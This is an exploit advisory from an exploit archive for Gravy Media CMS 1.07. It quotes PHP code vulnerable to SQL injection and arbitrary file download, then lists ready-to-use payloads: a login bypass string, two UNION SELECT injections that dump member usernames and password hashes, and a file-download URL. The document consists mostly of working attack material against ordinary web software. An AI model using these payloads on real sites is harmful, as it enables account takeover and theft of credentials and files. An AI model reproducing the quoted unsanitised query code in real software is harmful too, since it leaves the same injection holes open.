gravy media CMS 1.07 - Multiple Vulnerabilities

#########################################################################################
[0x01] Informations:
Name           : Gravy Media Cms 1.07
Download       : http://www.gravy-media.com/downloads.php
Vulnerability  : Multiple Sql Injections & Arbitrary File Download
Author         : x0r
Contact        : andry2000@hotmail.it
Notes          : Proud To Be Italian
Greetz         : //
#########################################################################################
[0x02] Bug:
Bugged file is /[path]/login.php [..] viewmsg.php [..] rate.php [..]forcedownload.php

[code]
//IF SUBMIT PRESSED FOR LOGIN 
if(isset($_POST['submit'])) {

$get_app = mysql_query("SELECT * FROM `members` WHERE username = '".$_POST['username']."' AND 
user_password = '".md5($_POST['password'])."'");
[/code]

[code]
 //you've to be logged
        //We need to grab the msg_id variable from the URL.
        $msg_id = $_REQUEST['msg_id'];
        
        //Get all of the information about the message with and id number of the one sent through the URL
        $view_msg = mysql_query("SELECT * FROM messages WHERE id = '$msg_id'");
        $msg = mysql_fetch_array($view_msg);
		
[/code]

[code]

include "connect.php";
$action = $_GET["action"];
if (!$action)
  $action = $_POST["action"];

//print"action = $action";

if ($action == "rate"){
$filename = $_GET["file"];
$getcount = mysql_query("SELECT * FROM files WHERE image='$filename'"); 
 [/code]
 
 [code]
 
 
$filename = $_GET['file'];

//Huge thank you to eLouai for this simple but powerful add-on

// required for IE, otherwise Content-disposition is ignored
if(ini_get('zlib.output_compression'))
  ini_set('zlib.output_compression', 'Off');

// addition by Jorg Weske
$file_extension = strtolower(substr(strrchr($filename,"."),1));

if( $filename == "" ) 
{
  echo "<html><title>eLouai's Download Script</title><body>ERROR: download file NOT SPECIFIED. USE force-download.php?file=filepath</body></html>";
  exit;
} elseif ( ! file_exists( $filename ) ) 
{
  echo "<html><title>eLouai's Download Script</title><body>ERROR: File not found. USE force-download.php?file=filepath</body></html>";
  exit;
};
switch( $file_extension )
{
  case "pdf": $ctype="application/pdf"; break;
  case "exe": $ctype="application/octet-stream"; break;
  case "zip": $ctype="application/zip"; break;
  case "doc": $ctype="application/msword"; break;
  case "xls": $ctype="application/vnd.ms-excel"; break;
  case "ppt": $ctype="application/vnd.ms-powerpoint"; break;
  case "gif": $ctype="image/gif"; break;
  case "png": $ctype="image/png"; break;
  case "jpeg":
  case "jpg": $ctype="image/jpg"; break;
  default: $ctype="application/force-download";
}
header("Pragma: public"); // required
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private",false); // required for certain browsers 
header("Content-Type: $ctype");
// change, added quotes to allow spaces in filenames, by Rajkumar Singh
header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".filesize($filename));
readfile("$filename");
exit();

[/code]
 
#########################################################################################
[0x03] Exploits:
1- admin' or ' 1=1--
2- [LoginRequired] http://site.it/viewmsg.php?msg_id=' union select 0,0,0,concat(username,char(54),user_password),0,0 from members--
3- http://site.it/rate.php?action=rate&file=' union select 0,0,0,concat(username,user_password),0,0 from members--
4- http://site.it/forcedownload.php?file=[file]
########################################################################################

# milw0rm.com [2009-03-30]